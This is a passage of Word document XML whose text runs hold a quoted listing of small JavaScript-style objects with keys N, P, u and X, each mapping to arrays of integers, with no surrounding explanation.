    <w:p w14:paraId="5D11CC9D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE384D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496B2157" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEAD129" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [8, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2466E178" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 6, 7, 8, 9, 10, 11, 12, 13, 16, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19E48EB0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5, 14, 15, 23, 40, 219, 249, 277, 282, 283, 330, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042C476" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C77CA7E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AA025B5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD353BD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [8, 14, 15, 18, 22, 23, 131, 159, 167, 262, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32406256" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B094D90" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF182B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7230E552" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 19, 33, 39, 128]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA6D21" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E996C05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED1DE45" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0448F0D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D4BE747" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F48F11" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 16,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38217E2E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [7, 20, 17, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F27FFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 17, 18, 19, 20],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D248EC9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E867D53" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3882BDDB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA5932" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC9674" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2497F6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48E69E92" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525E1796" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB971" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 72, 73]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C63019" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082FCEEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D223B82" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551B9CB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B516796" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFFEEF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017EAF7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="741EB502" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5912F7D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BA46D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503BD914" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2303B899" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 175]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60CD8160" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E917C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77419683" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A381767" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E68EFA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C07EE60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3750C5BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BF074E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 5, 117]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8809CA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC44AE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1386D4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B282EA9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F92D359" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC2E1E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45609250" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D9E09B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 5, 37, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A501B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363005AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3, 0, 4, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B56D74C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8E7ECF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [249, 282, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA3C34F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B888E22" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C17F6C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A42409B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB54323" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD84D6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3DC788" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C1C7251" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [22, 23, 159, 245, 311, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5A52F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562D706C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283EBCE6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 5, 6, 9],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E178FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 4, 7, 8, 85]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EAFC38" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DAAB50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEAF406" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A093D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6053D30D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD48BEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170862F5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [6, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C90767" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 3, 4, 5, 7, 9, 10, 11, 13, 14, 15, 16, 23, 35, 218, 238, 333]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="362DCF50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16770230" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9BA1E8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639F4381" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEDA060" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A2E6E07" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FAC6E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC6C00B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C235CC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339697BF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33483C8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7547AF9B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28CAF6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FF30BB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFD6F50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA45A27" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02238162" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [68, 150, 213, 254, 276]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27273FC8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C69175" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C71005" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABE5379" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [26, 100, 255]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729549FB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64441A4B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23B18FAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE1D748" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0CD387" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="631BAAF2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3779FC00" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC57007" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [3, 4, 5, 6, 8, 12, 15, 17, 18],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A67A930" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1, 2, 7, 9, 10, 11, 13, 14, 16, 23, 218]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D27ECF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2757CC74" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4B3E5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A3F615" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 19, 90]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48247957" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4FE628" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="263D676C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB55A60" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7458DAEE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD3D64C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD0E292" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0490E764" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46098D77" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7784F986" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43658E14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
